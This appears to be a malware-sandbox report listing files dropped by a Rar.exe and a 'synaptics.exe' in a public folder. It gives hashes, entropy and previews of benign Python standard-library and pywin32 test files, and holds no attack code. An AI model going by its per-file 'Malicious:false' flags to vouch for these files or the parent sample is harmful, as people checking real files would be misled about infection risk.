                                                                                                                                                                                      SSDEEP:48:fkN+Qpd4chN+0kOHOQ9M+gmIDn9oK65YN00OB2IQ6:fQRpd4cTQOd++g/Dn9fUQ00OBQ6
                                                                                                                                                                                      MD5:023725FB08327B0F93297B41A9864D52
                                                                                                                                                                                      SHA1:6F940064603449C018FFEA45DB3C58A4EAE996B2
                                                                                                                                                                                      SHA-256:56555B38692A77E58FB1824A225B45E4FEBC68E018DE8CAF9D77EFF84413A746
                                                                                                                                                                                      SHA-512:45C92B1D846E706FF85C18203CC7D75162E2CFCF93287ADF62FE23726084D07D2CF6F4B8EE3FBC4ED296A6A8E7B36C7364EF5DE16C7C6684C6486B2011473506
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import time..import pythoncom.import win32api.from win32com.taskscheduler import taskscheduler..test_task_name = "test_addtask_1.job"..ts = pythoncom.CoCreateInstance(. taskscheduler.CLSID_CTaskScheduler,. None,. pythoncom.CLSCTX_INPROC_SERVER,. taskscheduler.IID_ITaskScheduler,.)..tasks = ts.Enum().for task in tasks:. print(task).if test_task_name in tasks:. print("Deleting existing task " + test_task_name). ts.Delete(test_task_name)..new_task = pythoncom.CoCreateInstance(. taskscheduler.CLSID_CTask,. None,. pythoncom.CLSCTX_INPROC_SERVER,. taskscheduler.IID_ITask,.).ts.AddWorkItem(test_task_name, new_task) ## task object is modified in place..new_task.SetFlags(. taskscheduler.TASK_FLAG_INTERACTIVE | taskscheduler.TASK_FLAG_RUN_ONLY_IF_LOGGED_ON.).new_task.SetIdleWait(1, 10000).new_task.SetComment("test task with idle trigger").new_task.SetApplicationName("c:\\python23\\python.exe").new_task.SetPriority(taskscheduler.REALTIME_PRIORITY_CLASS).new_ta
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1682
                                                                                                                                                                                      Entropy (8bit):5.152366525783661
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:fma/IBH+xutQCc+0E9l3gZ768xFeJLAfVB+D3AFF8Ljo0J3XaCiYnIQ6:fyN+o5b9Fgx6BLAdB+TY8l9IQ6
                                                                                                                                                                                      MD5:BDB96A0A73DC75AC451A280D91D8087B
                                                                                                                                                                                      SHA1:2C9CB9503888F1C91150EE8E55A3ACD65E2F81EB
                                                                                                                                                                                      SHA-256:FEA2A60A9EFB8E371780FEAC140C0056D9C5D6FE0AD55D9ECD613B596A520C33
                                                                                                                                                                                      SHA-512:5A1B472F6DC3F73197B7F16E3E09B7371F73F02B763FB96F9FAA66F8575F12CEEB3CA2E7DEAE9BD6C88A419D92B5A94D0DFE82E9903DA8E0D462A7F38C52BA32
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import time..import pythoncom.import win32api.from win32com.taskscheduler import taskscheduler..task_name = "test_addtask_2.job".ts = pythoncom.CoCreateInstance(. taskscheduler.CLSID_CTaskScheduler,. None,. pythoncom.CLSCTX_INPROC_SERVER,. taskscheduler.IID_ITaskScheduler,.).tasks = ts.Enum().for task in tasks:. print(task).if task_name in tasks:. print("Deleting existing task " + task_name). ts.Delete(task_name)..t = ts.NewWorkItem(task_name).t.SetComment("Test a task running as local system acct").t.SetApplicationName("c:\\python23\\python.exe").t.SetPriority(taskscheduler.REALTIME_PRIORITY_CLASS).t.SetParameters("test_localsystem.py").t.SetWorkingDirectory("c:\\python23").t.SetCreator("test_addtask_2.py").t.SetMaxRunTime(20000) # milliseconds.t.SetFlags(taskscheduler.TASK_FLAG_DELETE_WHEN_DONE).t.SetAccountInformation(. "", None.) ## empty string for account name means to use local system.## None is only valid for local system acct or if task flags contain
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                      Entropy (8bit):4.611896313876683
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Uv96vpdRTSHMvCFVkWTgmuDFw:UVuReHMKFSUgS
                                                                                                                                                                                      MD5:9BE57453C83E5AEEE160A8BC8B6A5B7D
                                                                                                                                                                                      SHA1:C33638E52DBC2FE9D0D28B7937EB42279F9A9FD8
                                                                                                                                                                                      SHA-256:C8C6DBA0D2ECE4AE7509A03A915D4331502156A21C854929ACE2342B997ACA5F
                                                                                                                                                                                      SHA-512:01245FB0D4B4D30348018B710B7D5A041E42759C2F2D1FA4CB9BDDB56C5C9E6CE13371A19F9C6CFAF29573B658827E79496DF6A4B064638631B42846F5712076
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:f = open("test_localsystem.txt", "w").f.write("I have run\n").f.close().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23261
                                                                                                                                                                                      Entropy (8bit):4.664005598458198
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rw2NAPbFYRmyZTm1xL0lpKPKxBj/XBrYjCQk209LSX84/sHiKKWPBD:xARYRvl0x4PSwYuQ6SrxZWN
                                                                                                                                                                                      MD5:23CF5B302F557F7461555A35A0DC8C15
                                                                                                                                                                                      SHA1:50DAAC7D361CED925B7FD331F46A3811B2D81238
                                                                                                                                                                                      SHA-256:73607E7B809237D5857B98E2E9D503455B33493CDE1A03E3899AA16F00502D36
                                                                                                                                                                                      SHA-512:E3D8449A8C29931433DFB058AB21DB173B7AED8855871E909218DA0C36BEB36A75D2088A2D6DD849EC3E66532659FDF219DE00184B2651C77392994C5692D86B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Append module search paths for third-party packages to sys.path.....****************************************************************..* This module is automatically imported during initialization. *..****************************************************************....This will append site-specific paths to the module search path. On..Unix (including Mac OSX), it starts with sys.prefix and..sys.exec_prefix (if different) and appends..lib/python<version>/site-packages...On other platforms (such as Windows), it tries each of the..prefixes directly, as well as with lib/site-packages appended. The..resulting directories, if they exist, are appended to sys.path, and..also inspected for path configuration files.....If a file named "pyvenv.cfg" exists one directory above sys.executable,..sys.prefix and sys.exec_prefix are set to that directory and..it is also checked for site-packages (sys.base_prefix and..sys.base_exec_prefix will always be the "real" prefixes of the Python..installation
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):36144
                                                                                                                                                                                      Entropy (8bit):4.545888734589651
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:M1Pd0G6YeQebxqrvBRA7tS71/2Gah4Z5xKL9zqdlhSqJuHvGcRQ+6PTCIMzxg5LU:Mf0G6dQlvBnXzHqH1Csxgtuz11
                                                                                                                                                                                      MD5:DE2ABF7E7E5C09972A5A181580AA182F
                                                                                                                                                                                      SHA1:02DB16013DF9343CDA71C26D24F9BC77C05FEB64
                                                                                                                                                                                      SHA-256:A1F374DC10CF17C6C69B5A236E7E6E1F3B909A88E737C3C555AB2492036D71C0
                                                                                                                                                                                      SHA-512:DA24EBE9D406608B17BF34714CE0477D35CEFACFCBFD250D7C0FAE7EB91ED915CAFD37BD0CA7FC6AE3523D07D1BF0529E61B9CBD5A23A97D8FF0C8E20F25006F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3.."""An RFC 5321 smtp proxy with optional RFC 1870 and RFC 6531 extensions.....Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]....Options:.... --nosetuid.. -n.. This program generally tries to setuid `nobody', unless this flag is.. set. The setuid call will fail if this program is not run as root (in.. which case, use this flag)..... --version.. -V.. Print the version number and exit..... --class classname.. -c classname.. Use `classname' as the concrete SMTP proxy class. Uses `PureProxy' by.. default..... --size limit.. -s limit.. Restrict the total size of the incoming message to "limit" number of.. bytes via the RFC 1870 SIZE extension. Defaults to 33554432 bytes..... --smtputf8.. -u.. Enable the SMTPUTF8 extension and behave as an RFC 6531 smtp proxy..... --debug.. -d.. Turn on debugging prints..... --help.. -h..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):46558
                                                                                                                                                                                      Entropy (8bit):4.473746236373843
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:rI6W3HVctoov8k0o+wt0ZEr1kNCLCkUethIqLbgaVIT4IlZiu3fWotlAJpEgjFe/:DWatDawzrmC9tYdFg8WLE6ebT
                                                                                                                                                                                      MD5:C3ABC5CDD8659418068B809948A7E7B8
                                                                                                                                                                                      SHA1:EEB64EF5A0E91B6644F1B9AF10C32A1E92C642C1
                                                                                                                                                                                      SHA-256:8B38C3B9019C810D4164A88D4C4D2A294D5181814B03B624A5B0EDB19C638166
                                                                                                                                                                                      SHA-512:0B8BA051F43D74F187F03DB395E90A9773CFD97562D0B91F619008740794D20E14E4C0772287822BBB634A193D40710EA5683F9FE9B086A4E8999D34F1F39E69
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3....'''SMTP/ESMTP client class.....This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP..Authentication) and RFC 2487 (Secure SMTP over TLS).....Notes:....Please remember, when doing ESMTP, that the names of the SMTP service..extensions are NOT the same thing as the option keywords for the RCPT..and MAIL commands!....Example:.... >>> import smtplib.. >>> s=smtplib.SMTP("localhost").. >>> print(s.help()).. This is Sendmail version 8.8.4.. Topics:.. HELO EHLO MAIL RCPT DATA.. RSET NOOP QUIT HELP VRFY.. EXPN VERB ETRN DSN.. For more info use "HELP <topic>"... To report bugs in the implementation send email to.. sendmail-bugs@sendmail.org... For local information send email to Postmaster at your site... End of HELP info.. >>> s.putcmd("vrfy","someone@here").. >>> s.getreply().. (250, "Somebody OverHere <somebody@here.my.org>").. >>> s.quit()..'''....# Author: The Dragon De Monsyne <drago
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7356
                                                                                                                                                                                      Entropy (8bit):4.8280737034749075
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:mwqBK/jkUx5LNc8ObfKwOCeidXjW6ddDDmQCpjHjKkz:mwA2efKc+7pjD3
                                                                                                                                                                                      MD5:CB6A9C7DE3FF807AD0359C739908DEAD
                                                                                                                                                                                      SHA1:283771E021D9DE729817336C15887841CE16859F
                                                                                                                                                                                      SHA-256:A1424AA73094E2F88E749D5ABFECF79941C4B3213881FF68C4AB7D54702ED9B5
                                                                                                                                                                                      SHA-512:7D806E7AA640D5C529837F58F9B4168D416F76A9BF6B7CACB98988387FCAF3565D7CCF4D1EA9CCA4DDC6643AD15F76883250C4BE016F592A387A9CC7083F051F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Routines to help recognizing sound files.....Function whathdr() recognizes various types of sound file headers...It understands almost all headers that SOX can decode.....The return tuple contains the following items, in this order:..- file type (as SOX understands it)..- sampling rate (0 if unknown or hard to decode)..- number of channels (0 if unknown or hard to decode)..- number of frames in the file (-1 if unknown or hard to decode)..- number of bits/sample, or 'U' for U-LAW, or 'A' for A-LAW....If the file doesn't have a recognizable type, it returns None...If the file can't be opened, OSError is raised.....To compute the total time, divide the number of frames by the..sampling rate (a frame contains a sample for each channel).....Function what() calls whathdr(). (It used to also use some..heuristics for raw data, but this doesn't work very well.)....Finally, the function test() is a simple main program that calls..what() for all files mentioned on the argument list. For dire
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37745
                                                                                                                                                                                      Entropy (8bit):4.6177949142646435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:bgXSVL2vXF5e7ZYGW3fBp58RrNrgIULHmdDS:bsDffBMRrdgIULHkDS
                                                                                                                                                                                      MD5:DFBE056F2D850425AA0B39D9DC6BDA6A
                                                                                                                                                                                      SHA1:A78C9D974BE1C3C49475BF35353B7AAD9771D567
                                                                                                                                                                                      SHA-256:3B058383016C22045FC99872E34CEC0ADF1234BFBFA13D486E721FCCC2945936
                                                                                                                                                                                      SHA-512:FA66AA6662B02048D3F438E8E2EC89EA96E8F5700205058A414253EAD5917BD737FC7C07B3158BD76EC26A3DD5CDD15D7A1F85335665ACD82FE260EED35797BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Wrapper module for _socket, providing some additional facilities..# implemented in Python....."""\..This module provides socket operations and some related functions...On Unix, it supports IP (Internet Protocol) and Unix domain sockets...On other systems, it only supports IP. Functions specific for a..socket are available as methods of the socket object.....Functions:....socket() -- create a new socket object..socketpair() -- create a pair of new socket objects [*]..fromfd() -- create a socket object from an open file descriptor [*]..send_fds() -- Send file descriptor to the socket...recv_fds() -- Recieve file descriptors from the socket...fromshare() -- create a socket object from data received from socket.share() [*]..gethostname() -- return the current hostname..gethostbyname() -- map a hostname to its IP number..gethostbyaddr() -- map an IP number or hostname to DNS info..getservbyname() -- map a service name and a protocol name to a port number..getprotobyname() -- map a protoco
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28140
                                                                                                                                                                                      Entropy (8bit):4.5175680890246905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:140jlGmx6MdZG5Ft+lNYk7gaUgKck2bw8N1xs5dghwHHOGQ/NfX:28wi0J8QywLdk/
                                                                                                                                                                                      MD5:159421B571226C335F310FCA087240ED
                                                                                                                                                                                      SHA1:ECE52601CAE44A979A55342045E046293780CB33
                                                                                                                                                                                      SHA-256:062B0F5441D9C60F01DD7A60E359ACDB01125E36DB2BED84DB58B2294523B14A
                                                                                                                                                                                      SHA-512:7ADE9382D2E307F2C2B81A096EED28EA367AB59BBA0DA80B424DB91242F48787AFBEF1EAFF750F0C52E724D5BEEABBA17C3687A4929C2F92059B324BF81EFC99
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Generic socket server classes.....This module tries to capture the various aspects of defining a server:....For socket-based servers:....- address family:.. - AF_INET{,6}: IP (Internet Protocol) sockets (default).. - AF_UNIX: Unix domain sockets.. - others, e.g. AF_DECNET are conceivable (see <socket.h>..- socket type:.. - SOCK_STREAM (reliable stream, e.g. TCP).. - SOCK_DGRAM (datagrams, e.g. UDP)....For request-based servers (including socket-based):....- client address verification before further looking at the request.. (This is actually a hook for any processing that needs to look.. at the request before anything else, e.g. logging)..- how to handle multiple requests:.. - synchronous (one request is handled at a time).. - forking (each request is handled by a new process).. - threading (each request is handled by a new thread)....The classes in this module favor the server type that is simplest to..write: a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2607
                                                                                                                                                                                      Entropy (8bit):4.782580700337305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:YOfevzhVebHd6wMTpe7d7h11pS1eBm0Tq6p6e9COnMfjUhgGnQU:YOeH4dd11cedbr9COn4jaQU
                                                                                                                                                                                      MD5:56E9464AEEC255E249414D00B5A39075
                                                                                                                                                                                      SHA1:899FDBF41346582414BC919615006626228B1A3D
                                                                                                                                                                                      SHA-256:3DF225315EFFCA29C26196714CF4653A554671EC877019B4BB9D2C0D3A951DD6
                                                                                                                                                                                      SHA-512:CC693DAEF562DE7B8F684AF49B36D1CC8CBBC427C332E9C000B87C12A96A19FC6548100EF2F77C679C011F7E1CF7A2B75C816A85540B50B1AB083222872A4F3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/__init__.py: the pysqlite2 package...#..# Copyright (C) 2005 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any source distri
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1659
                                                                                                                                                                                      Entropy (8bit):5.251597495375789
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:N2TWmbT1esm0TcObLNuETO6jG+Qv6Mqm0:N2TWmle8QNETO5zPq1
                                                                                                                                                                                      MD5:E4B3FAA2BB6EBD69E4CD5D9DB6677FDE
                                                                                                                                                                                      SHA1:5FED9B363EE69451682AC19772E62B191B722741
                                                                                                                                                                                      SHA-256:4A698067EEC867C55A8B9E6B3C412370D2689CB0D610089B27CDF64DB70400A5
                                                                                                                                                                                      SHA-512:29C3167532CE47A25EF2064B2FE2CBADEE2D58E4EE822D0E13EFEE79B0D401E3EBB80BC885316A7DB83CE21A73C21C34A8B5A1353966CAC57A68B11A92B025FD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d/........................@...s....d.Z.d.d.l.T.d.d...Z.d.S.).u.....The sqlite3 extension module provides a DB-API 2.0 (PEP 249) compliant.interface to the SQLite library, and requires SQLite 3.7.15 or newer...To use the module, start by creating a database Connection object:.. import sqlite3. cx = sqlite3.connect("test.db") # test.db will be created or opened..The special path name ":memory:" can be provided to connect to a transient.in-memory database:.. cx = sqlite3.connect(":memory:") # connect to a database in RAM..Once a connection has been established, create a Cursor object and call.its execute() method to perform SQL queries:.. cu = cx.cursor().. # create a table. cu.execute("create table lang(name, first_appeared)").. # insert values into a table. cu.execute("insert into lang values (?, ?)", ("C", 1972)).. # execute a query and iterate over the result. for row in cu.execute("select * from lang"):. print(row).. cx.close()..Th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2987
                                                                                                                                                                                      Entropy (8bit):5.130993463150614
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:b2fEkeTde1heBB/KP+7oheXYPX7sV2PXSedPuPXRGqPz0DOPXuPXDFePXd/UTb2a:qf8TdqhgB/6+7oheXYv7sV2vSeRuvRFg
                                                                                                                                                                                      MD5:96066D9EA4730FB8A52B9341CDD862A3
                                                                                                                                                                                      SHA1:566D9F02596B94C2CAA4FE07FECCADF6F8F8DF11
                                                                                                                                                                                      SHA-256:70B1E101D7919A2CA10B83AC079F4AB8631F594E99AE217042D739C7099C4FAB
                                                                                                                                                                                      SHA-512:A07F00D0B9BD689E93BE77BB0F32CFE4409D1AFE1977F0F2BE82CF08CC302CE6735BB6F06DF3CED43189963BD7D086114352F8348B254EA1EE1847C780C45359
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-db........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.Z.d.Z.d.Z.e.j.Z.e.j.Z.e.j.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d...e...d...D.....Z.e.d.d...e...d...D.....Z.e.Z.e.j.j...e.....d.d...Z.e.....d.d...Z.[.d.S.)......N)...*Z.qmark.....z.2.0c....................C........t.t...|...d.d.......S.).N.....)...Date..time..localtime..Z.ticks..r.....2C:\Users\Public\QExvbmVOb25l\lib\sqlite3\dbapi2.py..DateFromTicks)..........r....c....................C...s....t.t...|...d.d.......S.).Nr.........)...Timer....r....r....r....r....r......TimeFromTicks,...r....r....c....................C...r....).Nr....)...Timestampr....r....r....r....r....r......TimestampFromTicks/...r....r....c....................C........g.|.].}.t.|.....q.S.r........int.....0..xr....r....r......<listcomp>2..........r.......c....................C...r....r....r....r....r....r....r....r....3...r....c....................C...sP...d.d...}.d.d...}.d.d...}.d.d...}.t.t.j.|.....t.t.j.|.....t.d.|.....t.d.|.....d.S.).Nc........
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3426
                                                                                                                                                                                      Entropy (8bit):4.798494253126017
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:oOeH4d8NkmJjmelfgApz8ngv8fP1gJF/vG/vm/t/wvBFh244RmsRD9v8:ofLl/BTpz8gvse/vG/vm/t/wv28sRxv8
                                                                                                                                                                                      MD5:B25FAA499B2E8E766D581E09B20319F6
                                                                                                                                                                                      SHA1:F1B29C053EE58E14313C2640733D756C0C7FC213
                                                                                                                                                                                      SHA-256:7296221686BEB47624EA7BF4AB82E9D5AA4E25160042946D2827868897762694
                                                                                                                                                                                      SHA-512:ADDF733DC17A29AC1649878C3C8FAC467C9AA0DA9C3A0020FD6D58E7498E5C63BE6E55D957812DB2AD4EE2C251D635C838576709984416FF3DB342477D798AF4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/dbapi2.py: the DB-API 2.0 interface..#..# Copyright (C) 2004-2005 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any source d
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3374
                                                                                                                                                                                      Entropy (8bit):4.814493644979349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:x+tzfkdKSQqQAbhtPXe/dMB+GDb3rb9R5B/jdkI:8tzfkdKvAbrXe/OEGDb3b/jmI
                                                                                                                                                                                      MD5:B5E473D97E46AF8C8E0D471CA17FC3E4
                                                                                                                                                                                      SHA1:49547E57808925AC45611540E09F6B1C375EAF83
                                                                                                                                                                                      SHA-256:30769C19582B0F62506E6BF9E4F36A86F9FD92F2E5C618F770EB14DA0C05F16E
                                                                                                                                                                                      SHA-512:CD1262B666935CEEE69657A3186A4DC84EF788604E6ABD484A1D8E756283A4631149BCACE38725BD6930764C514636EA0AB77BB35B76FD07B64931276AFDAB5B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Mimic the sqlite3 console shell's .dump command..# Author: Paul Kippes <kippesp@gmail.com>....# Every identifier in sql is quoted based on a comment in sqlite..# documentation "SQLite adds new keywords from time to time when it..# takes on new features. So to prevent your code from being broken by..# future enhancements, you should normally quote any identifier that..# is an English language word, even if you do not have to."....def _iterdump(connection):.. """.. Returns an iterator to the dump of the database in an SQL text format..... Used to produce an SQL dump of the database. Useful to save an in-memory.. database for later restoration. This function should not be called.. directly but instead called from the Connection method, iterdump()... """.... cu = connection.cursor().. yield('BEGIN TRANSACTION;').... # sqlite_master table contains the SQL CREATE statements for the database... q = """.. SELECT "name", "type", "sql".. FROM "sqli
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6016
                                                                                                                                                                                      Entropy (8bit):4.741653622865881
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:tpVoJhXoX1i5lJ3tl/C3frCek2CL/wOz/HS2hrYIH8TfoDLubtonJA:tpV0XoX1OlBtl/Ors26/Tz/drYwcAHu/
                                                                                                                                                                                      MD5:AEC581A7572526389DB816001889E02E
                                                                                                                                                                                      SHA1:B76A4ECD889BF1700B76BB9D74EB71D264ECBD50
                                                                                                                                                                                      SHA-256:A49A36C9A094377078490C3FB7CBBA7B9F75B69FD8E6B14AA26B82F6E5FCF02C
                                                                                                                                                                                      SHA-512:4E82F0B3D4CC89A7139E520A054BCD16FFC59CE07FCB360B819766272ED911A0CCC14A0880ACE1F4EAA24F25C43A8B106B8E8AB9029C0E8E0C89A3601EEC79E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sqlite3 as sqlite..import unittest......class BackupTests(unittest.TestCase):.. def setUp(self):.. cx = self.cx = sqlite.connect(":memory:").. cx.execute('CREATE TABLE foo (key INTEGER)').. cx.executemany('INSERT INTO foo (key) VALUES (?)', [(3,), (4,)]).. cx.commit().... def tearDown(self):.. self.cx.close().... def verify_backup(self, bckcx):.. result = bckcx.execute("SELECT key FROM foo ORDER BY key").fetchall().. self.assertEqual(result[0][0], 3).. self.assertEqual(result[1][0], 4).... def test_bad_target(self):.. with self.assertRaises(TypeError):.. self.cx.backup(None).. with self.assertRaises(TypeError):.. self.cx.backup().... def test_bad_target_filename(self):.. with self.assertRaises(TypeError):.. self.cx.backup('some_file_name.db').... def test_bad_target_same_connection(self):.. with self.assertRaises(ValueError):.. self.cx
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):40385
                                                                                                                                                                                      Entropy (8bit):4.588087457692222
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:vAs/92/gGB+a2Oez3HduGt9H9r959A9L909U9HOo+EQcfll9DCX7:vAszz393hdryBCGJOjQlLDG
                                                                                                                                                                                      MD5:6539BCA6900C9B6C073C978D2ACF51B4
                                                                                                                                                                                      SHA1:8610EFAAC05DAB02FB6B6FBA4531FB2C98C82203
                                                                                                                                                                                      SHA-256:E61C779D30E6A5A59A28A6CF6196B56CDDCDD639EC8A1A171E072FED1CE7B628
                                                                                                                                                                                      SHA-512:2F362BFCDC54A750C4421A00059EC028683D6F5D59DE04DC78BB15BEAC176D5ACB33AC8026325BB50599719FE136CF898F6E149EF02AD3D465D9B470BF2AB62C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# pysqlite2/test/dbapi.py: tests for DB-API compliance..#..# Copyright (C) 2004-2010 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any s
